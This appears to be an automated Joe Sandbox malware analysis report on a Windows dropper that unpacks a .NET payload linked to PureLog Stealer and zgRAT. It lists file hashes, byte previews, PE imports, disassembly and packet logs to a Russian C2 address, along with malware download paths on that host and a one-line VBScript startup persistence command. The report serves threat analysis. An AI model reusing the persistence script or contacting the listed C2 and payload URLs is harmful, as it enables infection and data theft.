                            https://stackoverflow.com/q/11564914/23354;seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: safe
                            unknown
                            https://stackoverflow.com/q/2152978/23354seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: safe
                            unknown
                            http://ocsp.thawte.com0SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106705295.000001B8E4E17000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106622974.000001B8E6C12000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536908495.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe.0.dr, cvchost.exe.1.drtrue
                            • URL Reputation: safe
                            unknown
                            http://46.8.237.66seniorcommunicate.exe, 00000001.00000002.2524102736.00000000032D1000.00000004.00000800.00020000.00000000.sdmptrue
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              46.8.237.66
                              unknownRussian Federation
                              28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1545677
                              Start date and time:2024-10-30 20:18:08 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 6m 17s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:10
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:SecuriteInfo.com.FileRepMalware.3248.17662.exe
                              Detection:MAL
                              Classification:mal100.expl.evad.winEXE@7/3@0/1
                              EGA Information:
                              • Successful, ratio: 33.3%
                              HCA Information:
                              • Successful, ratio: 92%
                              • Number of executed functions: 178
                              • Number of non-executed functions: 36
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target InstallUtil.exe, PID 3796 because it is empty
                              • Execution Graph export aborted for target seniorcommunicate.exe, PID 6752 because it is empty
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: SecuriteInfo.com.FileRepMalware.3248.17662.exe
                              TimeTypeDescription
                              15:19:00API Interceptor49x Sleep call for process: seniorcommunicate.exe modified
                              20:19:44AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cvchost.vbs
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              46.8.237.66fCr6yd61xw.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                              • 46.8.237.66/spool02/Odgcgoez.wav
                              fCr6yd61xw.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                              • 46.8.237.66/spool02/Odgcgoez.wav
                              Zo1o3PhmtM.exeGet hashmaliciousUnknownBrowse
                              • 46.8.237.66/spool03/Cuyfu.wav
                              67JPbskewt.exeGet hashmaliciousUnknownBrowse
                              • 46.8.237.66/spool01/Jmkjslnf.dat
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfCr6yd61xw.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                              • 46.8.237.66
                              fCr6yd61xw.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                              • 46.8.237.66
                              Zo1o3PhmtM.exeGet hashmaliciousUnknownBrowse
                              • 46.8.237.66
                              67JPbskewt.exeGet hashmaliciousUnknownBrowse
                              • 46.8.237.66
                              SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                              • 46.8.236.61
                              nabspc.elfGet hashmaliciousUnknownBrowse
                              • 109.248.104.45
                              https://t.ly/BavariaFilmGmbH2410Get hashmaliciousUnknownBrowse
                              • 46.8.232.106
                              la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                              • 185.16.116.131
                              https://t.ly/ZPR23.10Get hashmaliciousUnknownBrowse
                              • 46.8.232.106
                              la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                              • 46.8.228.109
                              No context
                              No context
                              Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):57568
                              Entropy (8bit):6.820716747842333
                              Encrypted:false
                              SSDEEP:1536:XuDs9KP5GWe1iEEJKIO9vkkADDDDDm4g3y:Xu9RLqMJKICj4z
                              MD5:D9021E407CD5133BA842A9F6F21B606B
                              SHA1:67A90E9EF2E33248EE2F2AA6D3A53346726FA87C
                              SHA-256:B3D34711A7AA3D844F0F7184F1595C285A01F23BDB59AA159826519CF491954A
                              SHA-512:85BEC77977E14A9CB7F2D695F9ED36C70A67C40680B92410E277F82EAF174D2B80603FEFBCB3CE6DC7AA80DD02FB6F297633C9405957D3FCBC783660079B19DE
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 29%
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^..g.................B...........`... ........@.. .......................@............`..................................`..K............................ ....................................................... ............... ..H............text....@... ...B.................. ..`.rsrc................D..............@..@.reloc....... ......................@..B.................`......H........=...#...........................................................*...(....*...(....*.(....&*.0..s....... ........8........E....+...........8&...s...... ....~D...{....:....& ....8......*.(...... ....~D...{B...:....& ....8........E........P...8......(....u......(....r...p .......o....(...... ....~D...{8...:....& ....8.....p.....:H... ....~D...{8...:....& ....8........E....:...........85...80... ....8......(.... ....~D...{*...9....& ....8..... ....~D...{....:....& ....8.
                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:modified
                              Size (bytes):57568
                              Entropy (8bit):6.820716747842333
                              Encrypted:false
                              SSDEEP:1536:XuDs9KP5GWe1iEEJKIO9vkkADDDDDm4g3y:Xu9RLqMJKICj4z
                              MD5:D9021E407CD5133BA842A9F6F21B606B
                              SHA1:67A90E9EF2E33248EE2F2AA6D3A53346726FA87C
                              SHA-256:B3D34711A7AA3D844F0F7184F1595C285A01F23BDB59AA159826519CF491954A
                              SHA-512:85BEC77977E14A9CB7F2D695F9ED36C70A67C40680B92410E277F82EAF174D2B80603FEFBCB3CE6DC7AA80DD02FB6F297633C9405957D3FCBC783660079B19DE
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 29%
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^..g.................B...........`... ........@.. .......................@............`..................................`..K............................ ....................................................... ............... ..H............text....@... ...B.................. ..`.rsrc................D..............@..@.reloc....... ......................@..B.................`......H........=...#...........................................................*...(....*...(....*.(....&*.0..s....... ........8........E....+...........8&...s...... ....~D...{....:....& ....8......*.(...... ....~D...{B...:....& ....8........E........P...8......(....u......(....r...p .......o....(...... ....~D...{8...:....& ....8.....p.....:H... ....~D...{8...:....& ....8........E....:...........85...80... ....8......(.... ....~D...{*...9....& ....8..... ....~D...{....:....& ....8.
                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):83
                              Entropy (8bit):4.6663329267324505
                              Encrypted:false
                              SSDEEP:3:FER/n0eFHHoN+E2J5GTaDLACHn:FER/lFHIN723G4J
                              MD5:71E31D9548FE2D97AAFDC5134625927C
                              SHA1:45C47134175F743B5A1222D082E0D1A3D636B90D
                              SHA-256:102E8ED665A14D57DCB62D97B4865C71F7F14D025DCF3ACC012F7719401C38AA
                              SHA-512:BF84E5C9F3A1478C1C3AAE37A45F67A2EEBD7672736BBEBF84ED5C4417A5FE950C5CE6D41264798F3116CA45140BE93E6DD12EB66A86107A5C26ED6DA895C67E
                              Malicious:true
                              Reputation:low
                              Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Local\cvchost.exe"""
                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                              Entropy (8bit):7.100413056749933
                              TrID:
                              • Win64 Executable GUI (202006/5) 92.65%
                              • Win64 Executable (generic) (12005/4) 5.51%
                              • Generic Win/DOS Executable (2004/3) 0.92%
                              • DOS Executable Generic (2002/1) 0.92%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:SecuriteInfo.com.FileRepMalware.3248.17662.exe
                              File size:194'048 bytes
                              MD5:485927fe0c19012f31f1ef565254b374
                              SHA1:af67270688bdaca5c92425ce644f248703f80e41
                              SHA256:11d025152433189799f82de6b428f5ceb8ddb47573a38d51c267d48b891d498e
                              SHA512:725cee7409122a7da8e29f4e50f19942a18e472f8561f2d2b95ae72338f84cdf8b642f7cc9a53a5d9eb8fc68f38450f1d93ce8974b00878304d56fb5638c6581
                              SSDEEP:3072:OahKyd2n3195GWp1icKAArDZz4N9GhbkrNEk1Apa6T2I5zaeT:OahOZp0yN90QEppXSKaG
                              TLSH:4414BF5A67E420B6E4B6977098F202835A32BCB15B7986FF12C4D57E1E336C0A532F17
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."
                              Icon Hash:3b6120282c4c5a1f
                              Entrypoint:0x140008200
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x140000000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                              Time Stamp:0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:10
                              OS Version Minor:0
                              File Version Major:10
                              File Version Minor:0
                              Subsystem Version Major:10
                              Subsystem Version Minor:0
                              Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1
                              Instruction
                              dec eax
                              sub esp, 28h
                              call 00007FC938BA9AD0h
                              dec eax
                              add esp, 28h
                              jmp 00007FC938BA937Bh
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              dec eax
                              mov dword ptr [esp+08h], ebx
                              dec eax
                              mov dword ptr [esp+10h], edi
                              inc ecx
                              push esi
                              dec eax
                              sub esp, 000000B0h
                              and dword ptr [esp+20h], 00000000h
                              dec eax
                              lea ecx, dword ptr [esp+40h]
                              call dword ptr [000011CDh]
                              nop
                              dec eax
                              mov eax, dword ptr [00000030h]
                              dec eax
                              mov ebx, dword ptr [eax+08h]
                              xor edi, edi
                              xor eax, eax
                              dec eax
                              cmpxchg dword ptr [00004922h], ebx
                              je 00007FC938BA937Ch
                              dec eax
                              cmp eax, ebx
                              jne 00007FC938BA938Ch
                              mov edi, 00000001h
                              mov eax, dword ptr [00004918h]
                              cmp eax, 01h
                              jne 00007FC938BA9389h
                              lea ecx, dword ptr [eax+1Eh]
                              call 00007FC938BA9963h
                              jmp 00007FC938BA93ECh
                              mov ecx, 000003E8h
                              call dword ptr [0000117Eh]
                              jmp 00007FC938BA9339h
                              mov eax, dword ptr [000048F6h]
                              test eax, eax
                              jne 00007FC938BA93CBh
                              mov dword ptr [000048E8h], 00000001h
                              dec esp
                              lea esi, dword ptr [000013E9h]
                              dec eax
                              lea ebx, dword ptr [000013CAh]
                              dec eax
                              mov dword ptr [esp+30h], ebx
                              mov dword ptr [esp+24h], eax
                              dec ecx
                              cmp ebx, esi
                              jnc 00007FC938BA9397h
                              test eax, eax
                              jne 00007FC938BA9397h
                              dec eax
                              cmp dword ptr [ebx], 00000000h
                              je 00007FC938BA9382h
                              dec eax
                              mov eax, dword ptr [ebx]
                              dec eax
                              mov ecx, dword ptr [00001388h]
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa23c0xb4.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xf0000x24548.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0xe0000x408.pdata
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x340000x20.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x9a100x54.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x90100x118.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x91280x520.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x7b800x7c0060800deac1fde21b98089f2241ee6168False0.5499936995967742data6.096261782871538IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x90000x22c80x240059d15cdf89780817c3d48dd588a6a129False0.4136284722222222data4.727841929207054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0xc0000x1f000x4009d1580dccaf8e787a43caf4bba48a079False0.3212890625data3.1889769845125677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .pdata0xe0000x4080x60015cd12257317071f28e4f7b728f8825eFalse0.3932291666666667data3.1563665040475675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .rsrc0xf0000x250000x24600f76cd5652d090a049d6bec6ec62ceb47False0.7952171928694158data7.3102359756380215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x340000x200x200637787151ee546a94902de9694a58fd6False0.083984375data0.4068473715812382IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              AVI0xf9f80x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States0.2713099474665311
                              RT_ICON0x128140x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3225609756097561
                              RT_ICON0x12e7c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.41263440860215056
                              RT_ICON0x131640x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.4569672131147541
                              RT_ICON0x1334c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5574324324324325
                              RT_ICON0x134740xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6223347547974414
                              RT_ICON0x1431c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7369133574007221
                              RT_ICON0x14bc40x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.783410138248848
                              RT_ICON0x1528c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3829479768786127
                              RT_ICON0x157f40xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004662673505254
                              RT_ICON0x231c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5300829875518672
                              RT_ICON0x257700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6137429643527205
                              RT_ICON0x268180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.703688524590164
                              RT_ICON0x271a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.425531914893617
                              RT_DIALOG0x276080x2f2dataEnglishUnited States0.4389920424403183
                              RT_DIALOG0x278fc0x1b0dataEnglishUnited States0.5625
                              RT_DIALOG0x27aac0x166dataEnglishUnited States0.5223463687150838
                              RT_DIALOG0x27c140x1c0dataEnglishUnited States0.5446428571428571
                              RT_DIALOG0x27dd40x130dataEnglishUnited States0.5526315789473685
                              RT_DIALOG0x27f040x120dataEnglishUnited States0.5763888888888888
                              RT_STRING0x280240x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States0.6214285714285714
                              RT_STRING0x280b00x520dataEnglishUnited States0.4032012195121951
                              RT_STRING0x285d00x5ccdataEnglishUnited States0.36455525606469
                              RT_STRING0x28b9c0x4b0dataEnglishUnited States0.385
                              RT_STRING0x2904c0x44adataEnglishUnited States0.3970856102003643
                              RT_STRING0x294980x3cedataEnglishUnited States0.36858316221765913
                              RT_RCDATA0x298680x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                              RT_RCDATA0x298700x8faaMicrosoft Cabinet archive data, Windows 2000/XP setup, 36778 bytes, 1 file, at 0x2c +A "seniorcommunicate.exe", ID 2197, number 1, 2 datablocks, 0x1503 compressionEnglishUnited States1.00057099352874
                              RT_RCDATA0x3281c0x4dataEnglishUnited States3.0
                              RT_RCDATA0x328200x24dataEnglishUnited States0.7222222222222222
                              RT_RCDATA0x328440x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                              RT_RCDATA0x3284c0x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                              RT_RCDATA0x328540x4dataEnglishUnited States3.0
                              RT_RCDATA0x328580x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                              RT_RCDATA0x328600x4dataEnglishUnited States3.0
                              RT_RCDATA0x328640x18dataEnglishUnited States1.3333333333333333
                              RT_RCDATA0x3287c0x4dataEnglishUnited States3.0
                              RT_RCDATA0x328800xcdataEnglishUnited States1.6666666666666667
                              RT_RCDATA0x3288c0x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                              RT_RCDATA0x328940x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                              RT_GROUP_ICON0x3289c0xbcdataEnglishUnited States0.6117021276595744
                              RT_VERSION0x329580x408dataEnglishUnited States0.42151162790697677
                              RT_MANIFEST0x32d600x7e6XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.37734915924826906
                              DLLImport
                              ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                              KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
                              GDI32.dllGetDeviceCaps
                              USER32.dllShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
                              msvcrt.dll?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
                              COMCTL32.dll
                              Cabinet.dll
                              VERSION.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States
                              TimestampSource PortDest PortSource IPDest IP
                              Oct 30, 2024 20:19:00.752849102 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:00.758455038 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:00.758534908 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:00.759234905 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:00.764560938 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.629309893 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.629386902 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.629398108 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.629478931 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.629507065 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.629518986 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.629528999 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.629539967 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.629568100 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.629611969 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.630059958 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.630074978 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.630085945 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.630120993 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.630165100 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.634896994 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.634968996 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.634982109 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.635025024 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.635066032 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.635123968 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.759056091 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.759099007 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.759109020 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.759166002 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.759248972 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.759258986 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.759304047 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.759464025 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.759514093 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.759533882 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.759545088 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.759588957 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.759658098 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.759973049 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.760015011 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.760039091 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.760049105 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.760087013 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.760164022 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.811491013 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.878578901 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.878623962 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.878634930 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.878700972 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.878765106 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.878813982 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.878833055 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.878845930 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.878897905 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.879137039 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.879213095 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.879223108 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.879255056 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.879523993 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.879569054 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.879606009 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.879616976 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.879654884 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.879755974 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.879765987 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.879812956 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.888521910 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.888845921 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.888909101 CET4970980192.168.2.646.8.237.66
                              Oct 30, 2024 20:19:01.998239994 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.998287916 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.998297930 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.998426914 CET804970946.8.237.66192.168.2.6
                              Oct 30, 2024 20:19:01.998480082 CET804970946.8.237.66192.168.2.6
